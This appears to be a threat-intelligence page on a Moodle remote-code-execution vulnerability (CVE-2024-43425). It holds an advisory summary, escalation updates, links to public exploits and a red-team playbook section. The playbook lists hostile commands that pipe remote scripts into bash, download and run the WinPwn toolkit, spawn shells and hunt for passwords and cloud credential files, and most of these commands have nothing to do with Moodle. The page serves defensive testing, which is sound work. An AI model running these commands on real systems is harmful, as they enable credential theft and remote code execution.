CVE-2024-43425
Overview
This vulnerability is a code injection flaw (CWE-94) rooted in insufficient input validation within Moodle's calculated question types feature. The flaw arises due to inadequate restrictions on user-supplied code execution contexts when adding or updating questions, allowing untrusted input to be processed as executable code. The affected component is the question management subsystem responsible for handling calculated question definitions.
Vulnerability Description
A flaw was found in Moodle. Additional restrictions are required to avoid a remote code execution risk in calculated question types. Note: This requires the capability to add/update questions.
Impact
An attacker with permissions to add or update questions can execute arbitrary code on the Moodle server remotely, potentially leading to full system compromise. This requires no prior privileges beyond question management capabilities and no user interaction beyond authenticated access. The impact includes unauthorized control over the server environment, data exfiltration, and disruption of Moodle services. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates remote network exploitation with high complexity and no user interaction, emphasizing the criticality of the flaw.
Solution
Remediation involves applying vendor-issued patches as detailed in Red Hat Bugzilla report 2304253 and Moodle community advisories linked in the discussion forum 461193. Administrators should upgrade Moodle to the fixed versions released post-disclosure that enforce stricter execution restrictions on calculated question types. No specific workaround is documented; therefore, patching is the primary mitigation step to address this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Moodle learning management system arises from insufficient restrictions within the calculated question types feature, which can lead to remote code execution (RCE). This flaw allows an attacker, who has the capability to add or update questions within the system, to inject malicious code that can be executed on the server. The underlying issue stems from the way user input is processed and validated, which fails to adequately sanitize inputs before they are executed. This oversight creates a pathway for attackers to manipulate the application and execute arbitrary commands, potentially compromising the integrity and confidentiality of the system.
Attack vectors for this vulnerability primarily involve social engineering tactics or insider threats, where an attacker gains access to an account with permissions to create or modify questions. Once inside, the attacker can craft a specially designed question that includes malicious code. When the question is processed by the Moodle application, the code is executed on the server, leading to a full compromise of the system. This scenario highlights the critical need for strict access controls and user permissions, as even a single compromised account can lead to devastating consequences for the entire platform.
The real-world impact of this vulnerability can be significant, particularly for educational institutions and organizations that rely on Moodle for e-learning and training. A successful exploitation could result in unauthorized access to sensitive data, including student records, personal information, and proprietary content. The potential for data breaches not only poses legal and compliance risks but can also damage the institution's reputation and erode trust among users. Furthermore, the financial implications of remediation efforts, legal liabilities, and potential fines can be substantial, making this vulnerability a pressing concern for organizations utilizing Moodle.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments and code reviews can help identify and remediate weaknesses in the application. Additionally, employing web application firewalls (WAF) can provide an additional layer of protection by filtering out malicious requests before they reach the application. It is also crucial to enforce strict user permissions and limit the ability to add or modify questions to trusted users only. Educating users about the risks associated with social engineering and the importance of maintaining strong passwords can further reduce the likelihood of exploitation.
In conclusion, the vulnerability within the Moodle platform poses a serious risk of remote code execution due to inadequate input validation in calculated question types. The potential for exploitation through compromised accounts highlights the necessity for stringent access controls and user education. Organizations must adopt proactive detection and mitigation strategies to safeguard their systems against this threat, ensuring the integrity and security of their educational environments. By addressing these vulnerabilities promptly, institutions can protect their users and maintain the trust essential for successful e-learning initiatives.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-43425, with new proof-of-concept exploits emerging across multiple public repositories. This development indicates growing attacker interest and increasing accessibility of exploitation tools, which lowers the barrier for threat actors to leverage this vulnerability. Our telemetry shows a sharp rise in detection activity, underscoring that exploitation is moving beyond theoretical proof into active reconnaissance and potential compromise phases. Although the EPSS score remains high and stable, the proliferation of publicly available exploit code elevates the risk profile, particularly for environments where user privileges allow question modification. Defenders must recognize that the threat landscape is evolving rapidly, with adversaries now equipped to conduct authenticated remote code execution with greater ease. This shift amplifies the urgency for vigilant monitoring of privileged accounts and reinforces the criticality of layered security controls to mitigate exploitation attempts.
Update 2 — July 19, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-43425, reflecting a doubling in observed exploitation attempts within monitored environments. This increase coincides with the continued emergence and refinement of publicly available proof-of-concept exploits, which now demonstrate greater reliability and ease of use for adversaries possessing the necessary privileges to modify Moodle question content. The heightened detection trend underscores an expanding attacker focus on leveraging authenticated remote code execution vectors, intensifying the operational risk for affected organizations. Although the EPSS score remains stable, the qualitative surge in exploitation attempts signals an elevated threat posture that demands heightened vigilance. This evolving landscape amplifies the potential impact of successful intrusions, as threat actors can more readily execute arbitrary code remotely, potentially leading to broader system compromise and data exposure.
Update 3 — August 03, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Moodle vulnerability CVE-2024-43425. Our telemetry indicates a doubling in detection frequency, reflecting increased adversary interest in leveraging authenticated remote code execution within calculated question types. While the EPSS score remains largely stable, this surge in activity signals a growing operational focus on this attack vector, potentially driven by the availability of multiple new proof-of-concept exploits circulating on public repositories. This development elevates the threat landscape by increasing the likelihood of successful intrusions, especially in environments where question modification privileges are granted. Defenders should recognize that the expanding exploitation attempts amplify the risk of unauthorized code execution, which could facilitate broader system compromise and data exfiltration. Consequently, the threat level associated with CVE-2024-43425 has intensified, warranting heightened monitoring and response readiness.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Moodle | Moodle | All |
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
|
|
|
Moodle | Moodle | All |
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
|
|
|
Moodle | Moodle | All |
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
|
|
|
Moodle | Moodle | All |
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Moodle Remote Code Execution (CVE-2024-43425)
exploits/linux/http/moodle_rce
|
Michael Heinzl, RedTeam Pentesting GmbH | Unknown | linux | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Moodle 4.4.0 - Authenticated Remote Code Execution | Likhith Appalaneni | webapps | multiple | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RedTeamPentesting/moodle-rce-calculatedquestions
Scripts for Analysis of a RCE in Moodle Calculated Questions (CVE-2024-43425)
|
RedTeamPentesting | 19 | 5 | 2024-08-23 | View |
|
Snizi/Moodle-CVE-2024-43425-Exploit
|
Snizi | 3 | 2 | 2025-02-07 | View |
|
kazuya256/Moodle-authenticated-RCE
🚀 Exploit for Moodle 4.4.0 Authenticated RCE (CVE-2024-43425) — run commands remotely ⚡
|
kazuya256 | 2 | 1 | 2025-07-13 | View |
|
Tnot123/cve-2024-43425
|
Tnot123 | 0 | 0 | 2025-10-13 | View |
|
aninfosec/CVE-2024-43425-Poc
|
aninfosec | 0 | 0 | 2025-06-28 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-43425 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2304253 |
| moodle.org |
GitHub CVE
|
https://moodle.org/mod/forum/discuss.php?d=461193 |